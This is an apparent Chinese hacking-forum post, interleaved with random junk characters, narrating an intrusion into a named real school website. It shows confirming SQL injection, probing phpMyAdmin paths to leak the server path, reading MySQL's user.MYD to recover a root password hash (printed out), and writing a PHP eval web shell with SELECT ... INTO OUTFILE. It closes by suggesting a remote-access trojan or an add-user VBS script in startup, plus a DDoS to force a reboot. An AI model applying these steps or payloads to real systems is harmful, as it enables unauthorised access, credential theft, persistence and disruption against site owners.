第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏
, R: J; m+ [! P0 A4 k+ c发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
) u% E y. }2 O9 ]( E# Y* ~0 k9 p7 e+ q, V* D# I1 [
9 L; F6 @$ V, c! z
" t6 r- w9 K t y4 Y$ T/ C2 l" n) q- }常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
- q- r: L) K1 C7 f! b- d, o9 y: Y0 d0 t+ v7 o
那么想可以直接写入shell ,getshell有几个条件:
% D7 L' V( @; Z: A: J! K! E1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF . j8 O/ ~0 |* }& L p5 x8 w( \
4 }8 A0 R& \+ N! \& E试着爆绝对路径:
6 L$ ~3 t8 |# v! t3 P5 X6 ]1./phpMyAdmin/index.php?lang[]=1 * b+ b3 ^' z' D* H8 f1 q
2./phpMyAdmin/phpinfo.php
% Q( M& J% P0 B: ?9 K3./load_file()
5 g6 ~& X- O/ l5 R; \( P* R! ?4./phpmyadmin/themes/darkblue_orange/layout.inc.php
# q2 E |; [% |% M5./phpmyadmin/libraries/select_lang.lib.php
' Z8 _, e8 n' e U, j8 G6./phpmyadmin/libraries/lect_lang.lib.php
e0 ^& r) I P3 L6 A C7./phpmyadmin/libraries/mcrypt.lib.php - ]" p& D0 F% V3 a; N
8./phpmyadmin/libraries/export/xls.php 7 J4 V, [6 m& X/ L- f1 Y
! J) T: J9 v4 |' T7 c均不行........................... $ l8 r' K7 C' I- x* e
6 U- X" A8 a$ A5 _' D B
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php / F, y& U* d$ c+ T# }& b- m
8 n9 p& _& n$ A2 o( \; v
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin 1 N/ @' i- a( u5 O! x
|# m. L' t% C4 X: n
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
, \( Q# o- `0 I( h8 l
% W: j7 H9 P ?, a: h敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... / z7 X3 H+ h6 W4 b4 M% J5 c+ O2 d: l
# X3 k* c) J# g; d
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
& X$ w9 Z8 u( ]1 p2 S2 d: U' d" t3 t8 I6 w/ H! K. l% p
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
! m2 c' {) c8 G+ v6 [/ V
7 s( g, ]$ W5 x自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
' ?( i* c& }' I
9 N* o6 W+ [- y* q成功读到root密码: * X' l7 B. V) V
1 _2 W8 S1 o; @5 i% i17---- r(0072) 1 e0 c5 B) M' n+ c+ j3 f: e- k
18---- o(006f) # ^6 V$ u1 C4 B- Q7 g7 Y; M
19---- o(006f) : l# a' a/ D) c# S, M- V) `
20---- t(0074) ( f, R7 s* w) L0 F, s- ]
21---- *(002a)
: i5 p! e' R0 H9 M22---- 8(0038) 1 n0 k, F/ x f' E+ E- Z I$ p! q
23---- 2(0032)
' P+ D3 J" D6 X1 N3 V8 q8 e24---- E(0045)
4 p3 i! r4 i/ F! z! @25---- 1(0031) - n# _) U5 U7 x! S& _8 b' O, {
26---- C(0043) / I; t$ @ o% k3 b, \% u8 j
27---- 5(0035)
& Y9 t. X' e8 ]8 ]7 m28---- 8(0038) , B1 U! x$ _) Z! t8 c+ \/ b
29---- 2(0032) 4 [' p8 g3 L! \; j5 S) g
30---- 8(0038)
1 l$ b; e+ N7 u; K) w; M N31---- A(0041) a- H5 g, p4 k& c
32---- 9(0039)
5 n' o* s X- g& W7 z7 H33---- B(0042) $ _" _3 W$ y4 A3 n+ g7 ~. J) X. V
34---- 5(0035) 5 F) _) F, k2 k3 \
35---- 4(0034)
; [/ X3 s [$ N" z( t# K- f- V36---- 8(0038) 8 w/ A0 b+ z6 p0 p6 p
37---- 6(0036) ( I4 W: e% W. h8 n% h) N
38---- 4(0034) : r0 J3 }' e3 q+ E! S
39---- 9(0039) . t# z$ r$ z. P3 A. J6 a
40---- 1(0031) ( e/ j' L0 F3 h( O
41---- 1(0031) ' p" W; o; T8 c, J
42---- 5(0035)
) J2 b! P- S9 Q43---- 3(0033)
! {) x! K( ?9 s J# x( }& d @* M44---- 5(0035)
9 Y ^# b5 {! j1 v4 Q5 G c45---- 9(0039) 5 m% g8 ~5 k6 t
46---- 8(0038)
8 A/ m9 m8 G4 C* k# t4 k47---- F(0046) ; C5 o: H7 I7 Z& o8 [4 g- F8 Z9 A
48---- F(0046)
( l7 I$ b& f3 t( X! H49---- 4(0034)
2 W; S1 N" s) `50---- F(0046)
% N$ I5 J9 m" i" V6 o( M51---- 0(0030)
# |# w( W e1 q" L. \' \! p52---- 3(0033) 2 S6 ]* F( m6 ?$ b$ u6 }
53---- 2(0032)
+ Y4 L, H: k2 J7 |0 Y54---- A(0041)
) d. N. F# O1 l. {$ }" o+ I) y55---- 4(0034) ( G2 `" I7 {) N; J) V |9 j
56---- A(0041) ( d/ B6 Q% N/ n/ E* |
57---- B(0042)
; `8 }% H& @7 x9 b' y8 U2 J) r& c8 @58---- *(0044) 9 `1 J, f1 s6 A
59---- *(0035)
: Z3 _9 H: F$ G6 i60---- *(0041) / b- F3 K$ M) s1 k4 ^
61---- *0032)
& [/ g! b# Z6 v; e
5 b# G q0 P9 L5 P% B解密后成功登陆phpmyamin
* @; Z& Q8 ]7 N9 p+ k8 `
& z2 g# G/ c, x5 q" K3 o/ y' h, `% {7 g6 u
* h7 W, I5 x6 D( D0 Z; l; I; n) i& j( N7 ^9 d- F5 \- \7 S* \
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' 4 E& k: X$ l9 l! b! I
# L4 Y+ y. M+ |+ Q0 z成功执行,拿下shell,菜刀连接: ) |* ^/ D+ B' h
5 L. U5 k) Z8 Y$ E( K% f. U4 G服务器不支持asp,aspx,php提权无果................... 9 A6 [2 Q- Q( h. j9 o. k/ y5 y
& s) Q" C, Y2 f4 u) A9 p但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: & L9 i: g! H' B9 o+ h s+ L% K
服务器上已经有个隐藏帐号了 9 W( e2 u: N0 `3 `
别名 administrators
" p+ N0 z& Q; _+ h4 C注释 管理员对计算机/域有不受限制的完全访问权
$ [0 F9 J* e9 z- m成员
# W- ~) [; {) Y1 G. x7 w-------------------------------------------------------------------------------2 C& z' Y4 P% C b! O9 {
admin/ I$ e$ ?5 o* t1 A
Administrator: q0 e5 `) ] T0 _* o4 [2 e3 P
slipper$
2 X0 a1 s- A& I3 Csqluser6 T4 S7 L4 F+ | h+ [9 `$ x! E, L
命令成功完成。
- H9 M3 S2 }, ~7 J/ ]# P1 ^+ B9 I/ {# a
4 }1 i- T% ?1 c- _9 q服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
2 P3 P/ a5 \+ L' h
/ e7 c3 W; g; B# v7 _ddos服务器重启,不然就只能坐等服务器重启了..............................." ^) k5 Y# f% f" Y
2 ~# J; {1 ]; N4 p* j) w. Z) u. _ 2 ]4 l0 A. G1 h: J( ^6 C1 `
| 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
